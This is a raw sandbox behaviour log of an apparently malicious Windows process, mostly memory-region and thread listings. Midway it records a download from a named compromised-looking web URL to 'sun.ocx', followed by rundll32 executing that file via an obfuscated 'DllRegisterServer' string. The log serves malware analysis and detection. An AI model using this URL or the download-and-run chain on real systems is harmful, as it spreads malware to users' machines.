0x74104fff monitored = 0 entry_point = 0x740f12de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 944 start_va = 0x74110000 end_va = 0x74161fff monitored = 0 entry_point = 0x741114be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 945 start_va = 0x740e0000 end_va = 0x740ecfff monitored = 0 entry_point = 0x740e1326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 946 start_va = 0x740d0000 end_va = 0x740d5fff monitored = 0 entry_point = 0x740d125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 947 start_va = 0xbab0000 end_va = 0xbaeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bab0000" filename = "" Region: id = 948 start_va = 0xbb70000 end_va = 0xbbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bb70000" filename = "" Region: id = 949 start_va = 0xc7c0000 end_va = 0xc7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c7c0000" filename = "" Region: id = 950 start_va = 0xc940000 end_va = 0xc97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c940000" filename = "" Region: id = 951 start_va = 0xc980000 end_va = 0xca7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c980000" filename = "" Region: id = 952 start_va = 0xcb00000 end_va = 0xcb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb00000" filename = "" Region: id = 953 start_va = 0xda90000 end_va = 0xdb8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000da90000" filename = "" Region: id = 954 start_va = 0x7ef5a000 end_va = 0x7ef5cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef5a000" filename = "" Region: id = 955 start_va = 0x7ef80000 end_va = 0x7ef82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 956 start_va = 0x742a0000 end_va = 0x742dbfff monitored = 0 entry_point = 0x742a145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 957 start_va = 0x74290000 end_va = 0x74294fff monitored = 0 entry_point = 0x742915df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 958 start_va = 0xf9f0000 end_va = 0xf9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f9f0000" filename = "" Region: id = 959 start_va = 0x74270000 end_va = 0x74275fff monitored = 0 entry_point = 0x742714b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 960 start_va = 0x74280000 end_va = 0x74285fff monitored = 0 entry_point = 0x74281673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 961 start_va = 0x74230000 end_va = 0x74267fff monitored = 0 entry_point = 0x7423990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1130 start_va = 0xbb30000 end_va = 0xbb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bb30000" filename = "" Region: id = 1131 start_va = 0xe1f0000 end_va = 0xe22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e1f0000" filename = "" Region: id = 1132 start_va = 0xf880000 end_va = 0xf97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f880000" filename = "" Region: id = 1133 start_va = 0x7ef39000 end_va = 0x7ef3bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef39000" filename = "" Region: id = 1134 start_va = 0xc800000 end_va = 0xc939fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c800000" filename = "" Region: id = 1135 start_va = 0xe090000 end_va = 0xe18dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e090000" filename = "" Region: id = 1136 start_va = 0xe520000 end_va = 0xe61dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e520000" filename = "" Region: id = 1138 start_va = 0x7510000 end_va = 0x751ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007510000" filename = "" Region: id = 1139 start_va = 0xb0d0000 end_va = 0xb11bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b0d0000" filename = "" Region: id = 1140 start_va = 0xbf20000 end_va = 0xbf95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bf20000" filename = "" Region: id = 1141 start_va = 0x7750000 end_va = 0x775ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007750000" filename = "" Region: id = 1142 start_va = 0xfa00000 end_va = 0x109cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fa00000" filename = "" Region: id = 1143 start_va = 0x7510000 end_va = 0x7512fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007510000" filename = "" Region: id = 1144 start_va = 0x7750000 end_va = 0x7751fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007750000" filename = "" Region: id = 1145 start_va = 0x7760000 end_va = 0x7761fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007760000" filename = "" Region: id = 1146 start_va = 0x7b80000 end_va = 0x7b80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b80000" filename = "" Region: id = 1147 start_va = 0x109d0000 end_va = 0x10fb5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000109d0000" filename = "" Region: id = 1155 start_va = 0x7510000 end_va = 0x7511fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007510000" filename = "" Region: id = 1156 start_va = 0x7b90000 end_va = 0x7b91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b90000" filename = "" Region: id = 1157 start_va = 0x85d0000 end_va = 0x85d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085d0000" filename = "" Region: id = 1158 start_va = 0x86f0000 end_va = 0x86f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086f0000" filename = "" Region: id = 1159 start_va = 0x8700000 end_va = 0x8701fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008700000" filename = "" Region: id = 1160 start_va = 0x9650000 end_va = 0x9654fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009650000" filename = "" Region: id = 1161 start_va = 0x9660000 end_va = 0x9663fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009660000" filename = "" Region: id = 1162 start_va = 0x98d0000 end_va = 0x98d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000098d0000" filename = "" Region: id = 1163 start_va = 0xb0d0000 end_va = 0xb0d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b0d0000" filename = "" Region: id = 1164 start_va = 0xb0e0000 end_va = 0xb0e2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b0e0000" filename = "" Region: id = 1165 start_va = 0xb0f0000 end_va = 0xb0f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b0f0000" filename = "" Region: id = 1166 start_va = 0xb100000 end_va = 0xb100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b100000" filename = "" Region: id = 1167 start_va = 0x75330000 end_va = 0x75354fff monitored = 0 entry_point = 0x75332b71 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1168 start_va = 0x67a00000 end_va = 0x67a8bfff monitored = 0 entry_point = 0x67a05382 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\SysWOW64\\UIAutomationCore.dll" (normalized: "c:\\windows\\syswow64\\uiautomationcore.dll") Region: id = 1169 start_va = 0x75320000 end_va = 0x7532afff monitored = 0 entry_point = 0x753252a0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 1170 start_va = 0x67880000 end_va = 0x678e0fff monitored = 0 entry_point = 0x678bbf40 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\SysWOW64\\wbemcomn2.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn2.dll") Region: id = 1171 start_va = 0x75310000 end_va = 0x7531efff monitored = 0 entry_point = 0x753193d0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 1509 start_va = 0x7510000 end_va = 0x7510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007510000" filename = "" Region: id = 1510 start_va = 0x7b90000 end_va = 0x7b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b90000" filename = "" Region: id = 1511 start_va = 0xa810000 end_va = 0xab99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a810000" filename = "" Region: id = 1512 start_va = 0x675c0000 end_va = 0x67665fff monitored = 0 entry_point = 0x6762a2f0 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 1513 start_va = 0x67860000 end_va = 0x67877fff monitored = 0 entry_point = 0x67861335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\SysWOW64\\ntdsapi.dll" (normalized: "c:\\windows\\syswow64\\ntdsapi.dll") Region: id = 1514 start_va = 0x7510000 end_va = 0x751ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007510000" filename = "" Region: id = 1515 start_va = 0x7b90000 end_va = 0x7b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b90000" filename = "" Region: id = 1516 start_va = 0x85d0000 end_va = 0x85d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085d0000" filename = "" Region: id = 1517 start_va = 0x85f0000 end_va = 0x85f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085f0000" filename = "" Region: id = 1518 start_va = 0x8600000 end_va = 0x8616fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008600000" filename = "" Region: id = 1519 start_va = 0x8620000 end_va = 0x8620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008620000" filename = "" Region: id = 1520 start_va = 0x85f0000 end_va = 0x86c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085f0000" filename = "" Region: id = 1555 start_va = 0x7510000 end_va = 0x7510fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1556 start_va = 0x7b90000 end_va = 0x7b96fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1557 start_va = 0x7510000 end_va = 0x7510fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1558 start_va = 0x7b90000 end_va = 0x7b96fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1559 start_va = 0x7510000 end_va = 0x7510fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1560 start_va = 0x7b90000 end_va = 0x7b96fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1561 start_va = 0x7510000 end_va = 0x7510fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1562 start_va = 0x7b90000 end_va = 0x7b96fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1563 start_va = 0x7510000 end_va = 0x7510fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1564 start_va = 0x7b90000 end_va = 0x7b96fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1565 start_va = 0x7510000 end_va = 0x7510fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1566 start_va = 0x7b90000 end_va = 0x7b96fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1567 start_va = 0x7510000 end_va = 0x7510fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1568 start_va = 0x7b90000 end_va = 0x7b96fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1569 start_va = 0x7510000 end_va = 0x7510fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1570 start_va = 0x7b90000 end_va = 0x7b96fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1587 start_va = 0x7510000 end_va = 0x7514fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007510000" filename = "" Region: id = 1588 start_va = 0x8710000 end_va = 0x8726fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008710000" filename = "" Region: id = 1732 start_va = 0x75300000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75302012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 1733 start_va = 0x67840000 end_va = 0x67851fff monitored = 0 entry_point = 0x67843271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 1735 start_va = 0x67d40000 end_va = 0x67d47fff monitored = 0 entry_point = 0x67d434d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 1739 start_va = 0x67580000 end_va = 0x675befff monitored = 0 entry_point = 0x67582351 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1740 start_va = 0x674b0000 end_va = 0x67571fff monitored = 0 entry_point = 0x674b119a region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\SysWOW64\\webservices.dll" (normalized: "c:\\windows\\syswow64\\webservices.dll") Region: id = 2138 start_va = 0x2f0000 end_va = 0x2f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 2139 start_va = 0x1190000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 2140 start_va = 0xdc00000 end_va = 0xdcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dc00000" filename = "" Region: id = 2141 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 2142 start_va = 0x2f0000 end_va = 0x2f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 2143 start_va = 0x300000 end_va = 0x300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 2172 start_va = 0x2f0000 end_va = 0x2fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 2173 start_va = 0x310000 end_va = 0x310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 2174 start_va = 0x320000 end_va = 0x320fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 2175 start_va = 0x10f0000 end_va = 0x10f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 2176 start_va = 0x1110000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 2177 start_va = 0x7ba0000 end_va = 0x7c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ba0000" filename = "" Region: id = 2178 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 2179 start_va = 0x1150000 end_va = 0x1184fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 2180 start_va = 0x7540000 end_va = 0x757ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007540000" filename = "" Region: id = 2181 start_va = 0xbe10000 end_va = 0xbf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000be10000" filename = "" Region: id = 2201 start_va = 0x6a80000 end_va = 0x6abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a80000" filename = "" Region: id = 2202 start_va = 0xaba0000 end_va = 0xac9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000aba0000" filename = "" Region: id = 2203 start_va = 0xbdd0000 end_va = 0xbecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bdd0000" filename = "" Region: id = 2204 start_va = 0x7ef9b000 end_va = 0x7ef9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 2218 start_va = 0x7560000 end_va = 0x759ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007560000" filename = "" Region: id = 2219 start_va = 0x75d0000 end_va = 0x760ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000075d0000" filename = "" Region: id = 2220 start_va = 0xb660000 end_va = 0xb75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b660000" filename = "" Region: id = 2221 start_va = 0xc840000 end_va = 0xc93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c840000" filename = "" Region: id = 2222 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 2223 start_va = 0x68d40000 end_va = 0x68d65fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "alrtintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\alrtintl.dll") Region: id = 2224 start_va = 0x68d10000 end_va = 0x68d35fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "alrtintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\alrtintl.dll") Region: id = 2225 start_va = 0x1100000 end_va = 0x1126fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "alrtintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\alrtintl.dll") Region: id = 2226 start_va = 0x1100000 end_va = 0x1119fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 2227 start_va = 0x2f0000 end_va = 0x2f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 2228 start_va = 0x1120000 end_va = 0x119ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 2229 start_va = 0x77b0000 end_va = 0x782ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~df0e8bec461e0e10fe.tmp" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~DF0E8BEC461E0E10FE.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~df0e8bec461e0e10fe.tmp") Region: id = 2230 start_va = 0x7be0000 end_va = 0x7c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007be0000" filename = "" Region: id = 2231 start_va = 0xb160000 end_va = 0xb25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b160000" filename = "" Region: id = 2232 start_va = 0x7ef9b000 end_va = 0x7ef9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Thread: id = 1 os_tid = 0xd1c Thread: id = 2 os_tid = 0xd18 Thread: id = 3 os_tid = 0xd14 Thread: id = 4 os_tid = 0xd10 Thread: id = 5 os_tid = 0xd0c Thread: id = 6 os_tid = 0xd08 Thread: id = 7 os_tid = 0xd04 Thread: id = 8 os_tid = 0xd00 Thread: id = 9 os_tid = 0xce8 Thread: id = 10 os_tid = 0xce4 Thread: id = 11 os_tid = 0xcc8 Thread: id = 12 os_tid = 0xcc4 Thread: id = 13 os_tid = 0xcc0 Thread: id = 14 os_tid = 0xcbc Thread: id = 15 os_tid = 0xcb8 Thread: id = 16 os_tid = 0xcb4 Thread: id = 17 os_tid = 0xcb0 Thread: id = 18 os_tid = 0xca8 Thread: id = 19 os_tid = 0xc84 Thread: id = 20 os_tid = 0xc7c Thread: id = 21 os_tid = 0xc78 Thread: id = 22 os_tid = 0xc74 Thread: id = 23 os_tid = 0xc70 Thread: id = 24 os_tid = 0xc6c Thread: id = 25 os_tid = 0xc68 Thread: id = 26 os_tid = 0xc64 Thread: id = 27 os_tid = 0xc60 Thread: id = 28 os_tid = 0xc5c Thread: id = 29 os_tid = 0xc40 [0086.841] ActivateActCtx (in: hActCtx=0x5e496c4, lpCookie=0x41b088 | out: hActCtx=0x5e496c4, lpCookie=0x41b088) returned 1 [0086.845] URLDownloadToFileA (param_1=0x0, param_2="http://gaidov.bg/wp-includes/Ug/", param_3="..\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx"), param_4=0x0, param_5=0x0) returned 0x0 [0087.911] WinExec (lpCmdLine="C:\\Windows\\SysWow64\\rundll32.exe ..\\sun.ocx,D\"&\"l\"&\"lR\"&\"egister\"&\"Serve\"&\"r", uCmdShow=0x2) [0614.853] CloseHandle (hObject=0xd28) returned 1 [0615.723] WriteFile (in: hFile=0x794, lpBuffer=0x42cd24*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x42ccf8, lpOverlapped=0x0 | out: lpBuffer=0x42cd24*, lpNumberOfBytesWritten=0x42ccf8*=0x2, lpOverlapped=0x0) returned 1 [0615.724] WriteFile (in: hFile=0x794, lpBuffer=0x42cd1c*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x42ccf8, lpOverlapped=0x0 | out: lpBuffer=0x42cd1c*, lpNumberOfBytesWritten=0x42ccf8*=0x2, lpOverlapped=0x0) returned 1 [0615.724] WriteFile (in: hFile=0x794, lpBuffer=0x42cd70*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x42ccf8, lpOverlapped=0x0 | out: lpBuffer=0x42cd70*, lpNumberOfBytesWritten=0x42ccf8*=0x10, lpOverlapped=0x0) returned 1 [0615.724] WriteFile (in: hFile=0x794, lpBuffer=0x42cd60*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x42cd1c, lpOverlapped=0x0 | out: lpBuffer=0x42cd60*, lpNumberOfBytesWritten=0x42cd1c*=0x2, lpOverlapped=0x0) returned 1 [0616.220] FreeLibrary (hLibModule=0x75a80000) returned 1 [0617.212] CloseHandle (hObject=0x334) returned 1 [0617.215] CloseHandle (hObject=0x330) returned 1 [0617.215] CloseHandle (hObject=0x32c) returned 1 [0617.215] CloseHandle (hObject=0x328) returned 1 Thread: id = 30 os_tid = 0xd20 Thread: id = 31 os_tid = 0xd28 Thread: id = 32 os_tid = 0xd38 Thread: id = 33 os_tid = 0xd3c Thread: id = 34 os_tid = 0xd40 Thread: id = 35 os_tid = 0xd48 Thread: id = 36 os_tid = 0xd4c Thread: id = 37 os_tid = 0xd50 Thread: id = 38 os_tid = 0xd7c Thread: id = 39 os_tid = 0xd80 Thread: id = 40 os_tid = 0xd84 Thread: id = 132 os_tid = 0xe9c Thread: id = 133 os_tid = 0xeb8 Thread: id = 140 os_tid = 0xef8 Thread: id = 143 os_tid = 0xf24 Thread: id = 148 os_tid = 0xf70 Thread: id = 155 os_tid = 0xfa4 Thread: id = 159 os_tid = 0xfcc Thread: id = 161 os_tid = 0xfdc Process: id = "2" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x398fb000" os_pid = "0xd88" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xc3c" cmd_line = "C:\\Windows\\SysWow64\\rundll32.exe ..\\sun.ocx,D\"&\"l\"&\"lR\"&\"egister\"&\"Serve\"&\"r" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 962 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 963 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 964 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 965 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 966 start_va = 0xf0000 end_va = 0xfdfff monitored = 0 entry_point = 0xf178c region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe") Region: id = 967 start_va = 0x200000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 968 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 969 start_va = 0x779e0000 